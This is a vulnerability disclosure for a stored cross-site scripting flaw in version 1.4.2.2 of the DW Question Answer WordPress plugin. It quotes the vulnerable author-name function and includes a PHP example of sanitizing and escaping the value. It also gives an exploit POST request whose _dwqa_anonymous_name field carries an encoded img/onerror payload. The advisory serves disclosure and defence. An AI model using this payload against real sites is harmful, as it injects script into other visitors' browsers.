WordPress DW Question Answer 1.4.2.2 Cross Site Scripting

2016-03-12T00:00:00
ID PACKETSTORM:136225
Type packetstorm
Reporter Rahul Pratap Singh
Modified 2016-03-12T00:00:00

Description

## FULL DISCLOSURE  
  
#Product : DW Question Answer  
#Exploit Author : Rahul Pratap Singh  
#Version : 1.4.2.2  
#Home page Link : https://wordpress.org/plugins/dw-question-answer/  
#Website : 0x62626262.wordpress.com  
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94  
#Date : 11/3/2016  
  
XSS Vulnerability:  
  
----------------------------------------  
Description:  
----------------------------------------  
The "_dwqa_anonymous_name" parameter is not sanitized, which leads to stored XSS: the value is saved as post meta and later printed as the author name.  
  
----------------------------------------  
Vulnerable Code:  
----------------------------------------  
  
User.php  
  
function dwqa_get_author( $post_id = false ) {  
    if ( ! $post_id ) {  
        $post_id = get_the_ID();  
    }  
  
    $display_name = false;  
    if ( dwqa_is_anonymous( $post_id ) ) {  
        // Value submitted as _dwqa_anonymous_name and stored as post meta.  
        // It is returned verbatim, with no escaping, so any markup in it  
        // reaches the rendered page.  
        $anonymous_name = get_post_meta( $post_id, '_dwqa_anonymous_name', true );  
        if ( $anonymous_name ) {  
            $display_name = $anonymous_name;  
        } else {  
            $display_name = __( 'Anonymous', 'dwqa' );  
        }  
    } else {  
        $user_id      = get_post_field( 'post_author', $post_id );  
        $display_name = get_the_author_meta( 'display_name', $user_id );  
    }  
  
    return apply_filters( 'dwqa_get_author', $display_name, $post_id );  
}  
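The following is an added example written for this advisory; it is not the plugin's code and not the 1.4.2.3 patch. It shows the two places a defender breaks this stored XSS: sanitizing the name when it is saved, and escaping it when it is rendered (the second also neutralises names stored before any fix). The `dwqa_example_*` function names are hypothetical; the `dwqa_get_author` filter hook is the one that appears in the vulnerable function above, and the `esc_html`, `sanitize_text_field` and `add_filter` calls are standard WordPress functions. The shims at the top exist only so the file runs under plain `php` outside WordPress.

```php
<?php
// Added example for this advisory; not the plugin's code and not the 1.4.2.3 patch.
// Function names dwqa_example_* are hypothetical.
// Shims so this file runs under plain `php` outside WordPress; inside WordPress
// the real functions exist and these definitions are skipped.
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    }
}
if ( ! function_exists( 'sanitize_text_field' ) ) {
    // Simplified stand-in for WordPress' sanitize_text_field().
    function sanitize_text_field( $str ) {
        $str = strip_tags( (string) $str );
        return trim( preg_replace( '/[\r\n\t ]+/', ' ', $str ) );
    }
}
if ( ! function_exists( '__' ) ) {
    function __( $text, $domain = 'default' ) {
        return $text;
    }
}

// Input side: what the ask-question handler should store in _dwqa_anonymous_name.
// Tags are stripped and the length is capped, so the meta never holds markup.
function dwqa_example_clean_anonymous_name( $raw ) {
    $name = sanitize_text_field( $raw );
    return function_exists( 'mb_substr' ) ? mb_substr( $name, 0, 60 ) : substr( $name, 0, 60 );
}

// Output side: same branch structure as the vulnerable dwqa_get_author(), but the
// stored value is HTML-escaped before it is handed to the template. Sanitizing on
// save alone is not enough: a stripped value can still contain '">' fragments.
function dwqa_example_author_display( $anonymous_name, $is_anonymous ) {
    if ( $is_anonymous ) {
        $display_name = $anonymous_name ? $anonymous_name : __( 'Anonymous', 'dwqa' );
    } else {
        $display_name = 'registered user'; // stand-in for get_the_author_meta()
    }
    return esc_html( $display_name );
}

// Site-side mitigation while a plugin is unpatched: the vulnerable function ends
// with apply_filters( 'dwqa_get_author', $display_name, $post_id ), so a theme or
// mu-plugin can hook that filter and escape whatever the plugin returns.
// esc_html() takes one argument, hence accepted_args = 1.
if ( function_exists( 'add_filter' ) ) {
    add_filter( 'dwqa_get_author', 'esc_html', 10, 1 );
}

if ( PHP_SAPI === 'cli' && ! function_exists( 'add_filter' ) ) {
    // Constructed input: the URL-decoded _dwqa_anonymous_name value from this advisory.
    $payload = '"><img src=x onerror=alert(1)><!--';
    echo 'stored  : ', dwqa_example_clean_anonymous_name( $payload ), PHP_EOL;
    echo 'rendered: ', dwqa_example_author_display( $payload, true ), PHP_EOL;
}
```

Run with `php` from the command line to see the saved form of the payload next to the escaped form that would reach the browser. The filter line is the part a site operator can drop into an mu-plugin without touching plugin files; the two `dwqa_example_*` functions show where the plugin itself should sanitize and escape.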
----------------------------------------  
Exploit:  
----------------------------------------  
  
POST /index.php/dwqa-ask-question/ HTTP/1.1  
  
question-title=abc&question-content=%3Cp%3Eabc%3C%2Fp%3E&question-category=2&question-tag=abc&_dwqa_anonymous_email=abc%40gmail.com&_dwqa_anonymous_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%3C%21--&_wpnonce=3164a8f439&_wp_http_referer=%2Fwp442%2Findex.php%2Fdwqa-ask-question%2F&dwqa-question-submit=Submit  
  
----------------------------------------  
POC:  
----------------------------------------  
https://0x62626262.files.wordpress.com/2016/03/dwqa_stored_xss.png  
  
Fix:  
Update to 1.4.2.3  
  
Vulnerability Disclosure Timeline:  
→ March 3, 2016 – Bug discovered, initial report sent to WordPress  
→ March 7, 2016 – No response, report sent again  
→ March 8, 2016 – WordPress responded, plugin taken down  
→ March 11, 2016 – Vendor deployed a patch  
  
#######################################  
# CTG SECURITY SOLUTIONS #  
# www.ctgsecuritysolutions.com #  
#######################################  
  
Pub Ref:  
https://wordpress.org/plugins/dw-question-answer/changelog/  
  